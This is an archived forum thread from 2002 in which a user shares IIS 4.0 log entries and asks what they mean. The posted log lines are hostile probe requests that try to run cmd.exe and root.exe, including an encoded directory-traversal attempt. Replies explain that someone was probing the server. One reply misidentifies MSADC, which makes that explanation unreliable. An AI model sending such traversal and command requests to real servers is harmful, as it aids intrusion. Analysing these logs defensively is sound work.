View Full Version : Hacked?

01-30-2002, 02:21 AM

Can someone please look at the log file below and tell me exactly what is going on? This is the log file from an IIS 4.0 server.


GET /scripts/root.exe /c+dir 404 604 72 2* 80 HTTP/*.0

GET /MSADC/root.exe /c+dir 404 604 70 20 80 HTTP/*.0
GET /c/winnt/system*2/cmd.exe /c+dir 404 604 80 20 80 HTTP/*.0
GET /msadc/..%5c../..%5c../..%5c/..../..../..../winnt/system*2/cmd.exe /c+dir 500 0 *45 *0 80 HTTP/*.0


these are just a few examples of the log entries.

01-30-2002, 11:56 AM
Sigh... I do wish you would use the term "Cracked": http://www.pcwebopaedia.com/TERM/h/hacker.html

llS huh, hmmm... Looks suspicious to me. Do you have all MS security (oxymoron) patches installed? I do believe Gibson's got some stuff on llS exploits somewhere in his labyrinth: http://grc.com/default.htm

01-31-2002, 04:13 AM

I guess the problem is not one of terminology but of language - no matter how cracked someone has been, what they probably feel is hacked -- it just sounds right.

01-31-2002, 10:19 AM

cmd has exploits.

02-24-2002, 06:20 AM

MSADC IS Microsoft Active Directory Connector


CARRIES OUT the command specified in string and then terminate.

some * was trying to execute a command on ur system
more like looking at the directory
dir 404 604 80 20 80 HTTP/*.0
GET /msadc/..%5c../..%5c../..%

SEE THE directory and what ever.

it looks like the person did not know it was an iis server and tried all what he knew.

he was having a look at whats in ur computer.
now call it crack or hack or what ever u wish.

regards Data.